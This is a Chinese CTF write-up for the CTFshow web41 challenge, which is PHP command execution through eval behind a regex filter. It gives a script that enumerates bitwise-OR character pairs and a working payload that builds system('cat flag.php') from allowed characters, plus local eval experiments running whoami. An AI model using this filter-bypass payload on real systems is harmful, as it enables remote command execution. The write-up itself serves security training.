CTFshow-WEB入门-命令执行web41

题目代码

<?php
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date:   2020-09-05 20:31:22
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
*/
if(isset($_POST['c'])){
    $c = $_POST['c'];
if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}

命令执行没有过滤 | ，可以通过对没有被过滤的字符进行或的位运算来得到想要的字符

先通过一个PHP脚本列出没有被过滤的字符的运算情况

<?php
for ($i = 0; $i < 256; $i++) //穷举Ascii的256个字符
    for ($j = 0; $j < 256; $j++) {
        $preg = '/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i';
        if (!preg_match($preg, chr($i)) && !preg_match($preg, chr($j))) { //Ascii转字符并找到没有被过滤的一对字符
            $x = chr($i) | chr($j); //运算出字符
            if (ord($x) >= 32 & ord($x) <= 126) //字符的Ascii符合范围
                echo $x . " %" . sprintf('%02s', dechex($i)) . " %" . sprintf('%02s', dechex($j)) . "<br>";
        }
    }

第一个是空格，比如要产生 () 就需要运算 %00%00 | %28%29

此题需要用system和cat flag.php也就是c=("%13%19%13%14%05%0d"|"%60%60%60%60%60%60")("%03%01%14%00%06%0c%01%07%00%10%08%10"|"%60%60%60%20%60%60%60%60%2e%60%60%60")

——————————————

实验，PHP特性

PHP-7.2.10

<?php
eval("('system')('whoami');");
eval("(hex2bin('13191314050d')|hex2bin('606060606060'))(hex2bin('17080f010d09')|hex2bin('606060606060'));");
echo hex2bin('13191314050d000017080f010d090000')|hex2bin('60606060606028276060606060602729');
eval("hex2bin('13191314050d000017080f010d090000')|hex2bin('60606060606028276060606060602729');");

回显，说明函数名和值必须分开
desktop-xxx desktop-xxx system('whoami')